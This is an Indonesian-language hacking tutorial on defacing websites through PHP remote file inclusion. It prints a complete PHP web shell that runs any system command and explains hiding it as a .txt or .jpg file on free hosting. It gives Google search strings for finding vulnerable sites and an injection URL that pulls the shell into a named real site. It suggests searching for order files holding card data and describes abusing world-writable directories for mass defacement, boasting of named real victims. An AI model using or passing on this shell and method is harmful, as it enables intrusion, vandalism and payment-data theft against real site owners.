Deface Dengan PHP Bugs
Kali
ini saya ingin membahas tentang bug yang udah lama, soalnya saya
pribadi paling jarang baca-baca tentang bug baru, dan paling malas
ngikutin perkembangan zaman,hehehe. makanye saya di sini bakal nulis bug
yang udah lama. Bug ini saya namain bug “tusuk-tusuk” tapi mungkin
semua pada bilang ini bug namanya inject php bug ☺.
Sebelum kita memulai ngelakuin bug ini di target kita, ada baiknya
kalian semua mengcopy dan paste code berikut ini ke website kalian,
entah itu di geocities, portland, atau di hosting kalian terserah
dah...
Ini dia code yang mesti kalian copy-paste ke site kalian semua ( note :
bagi ente-ente yang udah ada code ini di site kalian, gak perlu lagi,
ini bagi yang belom ada aja ).
</center></center><br><font face="verdana" size="7"><center><b>CMD</b> - System
Command<br><br></center></font><font face="Verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> Re-DESIGN by : <b>m_beben from #kartubeben @ Dalnet</b><br>
<br>
<br>
<hr>
<br>
<pre><font face="Verdana" size="1">
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<",
$output));
?>
</font></pre>
<br>
<hr>
<br>
<font face="Verdana" size="1">
<b># m_beben from #kartubeben @ Dalnet</b><br>
<b># www.kartubeben.com | www.kartubeben.org | www.kartubeben.net</b>
<br><b># Come and join with us on #kartubeben @ Dalnet</b>
</font>
Hmm... mungkin ada yang tanya, maksud saya sebenarnya apa seh dan gimana
cara masukin code ini ke site kite-kita pada ??? Gini lho maksud saya
:( ini kita balik ke dasar lagi yah )
1. karena saya rekomendasikan hosting geocities, maka sekarang kalian semua buka web geocities di www.geocities.com
2. trus kalo kalian udah ada account di sana ya silahkan login ke sana,
tapi kalo ente belom ada account, ada baiknya ente daftar dulu untuk
buat account hosting di sana
3. seep... kita udah buat satu account
4. lalu kita login ke account pukisek kita itu di www.geocities.com
5. udah selesai login ke sana silahkan buka file manager ente di sana
trus buatlah new file lalu isikan dengan code kita tadi. Ato kalo kalian
gak mau repot-repot, pertama-tama copy-paste code yang saya kasih tadi
ke pc kalian trus save dengan nama terserah kalian dengan ektensi .txt
atau .jpg
lalu silahkan upload file yang udah kalian save di pc ente ke hosting dengan account yang udah kita buat tadi
6. di hosting, kalian bisa save code kita tadi dengan nama cmd.txt ato cmd.jpg
Seep... sekarang code tadi udah kita simpan di hosting kita, jadi kita bisa ngakses tuh code entar di www.geocities.com/accountkalian/cmd.txt ato
www.geocities.com/accountkalian/cmd.jpg.
Nah, sekarang masalah berikutnya adalah mencari target ☺. Bicara soal
target adalah berbicara soal keberuntungan, wekekeke... saya aja kalo
cari yang namanya target itu susah mati lho Cape banget... nyebelelin,
bikin kesel,dll...
Nah, sekarang untuk masalah targetnya, kita bisa cari di google.com ☺ dengan keyword
allinurl: “index.php?*=*.htm*” ato allinurl: “index.php?*=*.php”
bisa juga
allinurl: “main.php?*=*.htm*” ato allinurl: “main.php?*=*.php”
terserah kalianlah mo pake apa keywordnya ☺☺☺
Okeh, misalnya kita udah dapat target di www.yugiohlegends.
com/main.php?page=beben.txt nah, ini target kita inject, caranya masukin
code inject php kita di target dengan cara
www.yugiohlegends.com/main.php?page=http://www.geocities.com/pukisek/cmd.jpg?&cmd=<di
sini dimasukin perintah unix command>
jadi, di tempat unix command itu bisa masukin command unix apa aja, misalnya perintah locate orders.txt ato
locate orders.log :P~ tapi penulis lebih sering cari file httpd.conf
dari pada orders.txt atau orders.log, soalnya saya bukan CARDER !!! :)
Okeh, kita gak bahas tentang saya ini seorang carder apa bukan, yang penting kalian semua bisa tentang masalah bug php ini.
Hm... tetapi inti sebenarnya yang saya mau bahas adalah bagaimana
mendeface web dengan memanfaatkan perpaduan antara bug php ini sendiri
dan permisi dari file-file di target kita. Siapa sangka jika seandainya
target yang enta ato penulis dapetin gak bisa untuk deface tetapi web
yang berada satu hosting dengan target kita ternyata bisa di deface ☺.
www.udoka.com , www.theunderline.com yang ampe sekarang masih dalam
keadaan terdeface ternyata saya deface dari target yang memiliki bug php
yang laen sedang target itu sendiri belom kedeface. Makanya, jangan
aneh kalo ada web yang saya deface padahal isinya hanya file-file
statis, bukan dynamic
file seperti .php ato .asp namun tetap aja kedeface ☺☺☺
Bahkan kalo kalian pernah melihat site www.interaktif-online.com (udah
mati) yang sempat beberapa kali kedeface ternyata di deface bukan dari
site itu langsung, tetapi melalui hostingnya dulu, yaitu
www.malang.indo.net.id
Nah, makanya jangan keburu nyesel dulu kalo liat ada target kita yang
gak bisa dideface (dengan asumsi kita malas ngeroot di target tersebut
macam penulis ☺).
Pertama-tama untuk melihat sebuah permisi file apakah sebanding dengan
user id yang kita jalankan, maka gunakan command id lalu ls –la namun
jangan keburu sedih dulu kalo ternyata user yang kita pake adalah nobody
dan user yang nulis file di target adalah bebenkeren misalnya.
Hmm... lalu kita perhatikan permisi file di target kita, apakah ada yang
bisa kita tulisi ? Biasanya karena kita nobody, file yang bisa ditulisi
nobody adalah file yang allow write permission di bagian othernya.
$ls –l
total 1023
drwxrwxrwx 100 bebenkeren kartubeben 43203 kartubeben
drwx---rw- 3 bebenkeren kartubeben 1234 deface
drwxr-xr-x 11 bebenkeren kartubeben 23421 hosting
drwx------ 1000 bebenkeren kartubeben 12345 secret
-rwxr-xr-x 1 bebenkeren kartubeben 1234 beben.txt
-rwxrwxrwx 1 bebenkeren kartubeben 2332 kartubeben.txt
Jika kita perhatikan contoh hasil command ls -l di atas, maka user yang
menulis di target adalah bebenkeren dengan group kartubeben sedangkan id
yang kita jalankan adalah nobody, maka file yang dapat kita tulisi ato
kita deface adalah folder kartubeben dan deface karena kedua file
tersebut memiliki permisi yang dapat ditulisi oleh other. Jadi misalnya
nama domain target kita adalah www.contoh.com maka kita bisa
mempublikasikan hasil deface kita di www.contoh.com/kartubeben ato di www.contoh.com/deface.
Trus gimana kalo target kita ketika kita cek ternyata hasilnya adalah seperti berikut :
$ls –l
total 1023
drwxr-xr-x 555 root root 50000 .
drwxrwxrwx 100 apache apache 40000 ..
drwxrwxr-x 100 bebenkeren kartubeben 43203 kartubeben
drwx---r-- 3 bebenkeren kartubeben 1234 deface
drwxr-xr-x 11 bebenkeren kartubeben 23421 hosting
drwx------ 1000 bebenkeren kartubeben 12345 secret
-rwxr-xr-x 1 bebenkeren kartubeben 1234 beben.txt
-rwxrwxrwx 1 bebenkeren kartubeben 2332 kartubeben.txt
$pwd
/home/kartubeben/
Hmm... jika kita melihat sepintas maka tak ada file yang bisa kita
tulisi sehingga kita tidak dapat mendeface target tersebut, tetapi
tunggu dulu !!!. Coba kita perhatikan dengan seksama ternyata directory
.. ato directory
sebelumnya/dibelakangnya ternyata memiliki permisi yang dapat ditulisi
oleh account nobody sebagai other, dan wow !!! jika kita mendapati
target yang demikian kita bisa melalukan mass defacing !!! ☺☺☺